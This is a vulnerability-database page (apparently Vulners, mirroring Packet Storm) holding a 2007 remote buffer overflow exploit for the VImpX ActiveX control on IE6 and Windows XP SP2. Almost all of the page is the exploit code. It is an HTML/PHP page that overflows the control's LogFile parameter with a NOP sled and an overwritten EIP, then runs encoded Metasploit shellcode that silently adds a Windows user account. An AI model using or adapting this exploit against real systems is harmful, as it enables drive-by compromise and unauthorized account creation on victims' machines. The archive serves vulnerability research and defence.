Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

vimp-overflow.txt

🗓️ 17 May 2007 00:00:00Reported by rgodType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Remote buffer overflow exploit in VImpX ActiveX (VImpX.ocx v. 4.7.3.0) for Windows XP SP2 IT versio

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<!-  
IE 6 / DB Software Laboratory VImpX ActiveX (VImpX.ocx v. 4.7.3.0)  
remote buffer overflow exploit  
windows xp sp2 it version / eip overwrite method  
by rgod  
site: http://retrogod.altervista.org  
mail: retrog at alice dot it  
  
software site: http://www.dbsoftlab.com/e107_plugins/content/content.php?content.53  
->  
<html>  
<object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' id='VImpAX1'>  
<?php  
/* win32_adduser - PASS=tzu EXITFUNC=seh USER=sun Size=483 Encoder=PexAlphaNum http://metasploit.com */  
$shellcode =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54".  
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x57".  
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x48".  
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x43\x4b\x38".  
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".  
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".  
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x58".  
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54".  
"\x4b\x38\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x51\x4b\x38".  
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x43".  
"\x42\x4c\x46\x46\x4b\x58\x42\x44\x42\x33\x45\x48\x42\x4c\x4a\x57".  
"\x4e\x50\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x41\x4d\x4a".  
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b".  
"\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x53".  
"\x48\x4f\x42\x36\x48\x55\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x47".  
"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x46\x4a\x49".  
"\x50\x4f\x4c\x38\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x4d\x56".  
"\x46\x36\x50\x32\x45\x46\x4a\x47\x45\x56\x42\x52\x4f\x52\x43\x36".  
"\x42\x52\x50\x46\x45\x56\x46\x47\x42\x52\x45\x47\x43\x37\x45\x56".  
"\x44\x57\x42\x42\x43\x57\x45\x47\x50\x56\x42\x52\x46\x47\x4c\x37".  
"\x45\x47\x42\x52\x4f\x42\x41\x34\x46\x34\x46\x54\x42\x42\x48\x42".  
"\x48\x32\x42\x52\x50\x46\x45\x36\x46\x57\x42\x52\x4e\x46\x4f\x36".  
"\x43\x56\x41\x46\x4e\x36\x47\x56\x44\x47\x4f\x36\x45\x57\x42\x37".  
"\x42\x52\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56\x49\x36\x43\x37".  
"\x46\x47\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37\x43\x37\x42\x52".  
"\x43\x57\x45\x57\x50\x46\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54".  
"\x42\x50\x5a";  
$junk = "\x45\x45\x45\x59";  
$eip = "\x2d\xd1\xe0\x77"; // call eax user32.dll  
$exploit= str_repeat("\x90",268).$eip.$junk."\x90\x90\x90\x0d\x01".str_repeat("\x90",16).$shellcode.str_repeat("\x90",9999);  
echo "<param name=\"LogFile\" value=\"$exploit\"/>";  
?>  
</object>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
vimpx activexbuffer overflowwindows xp.
18
.json
Report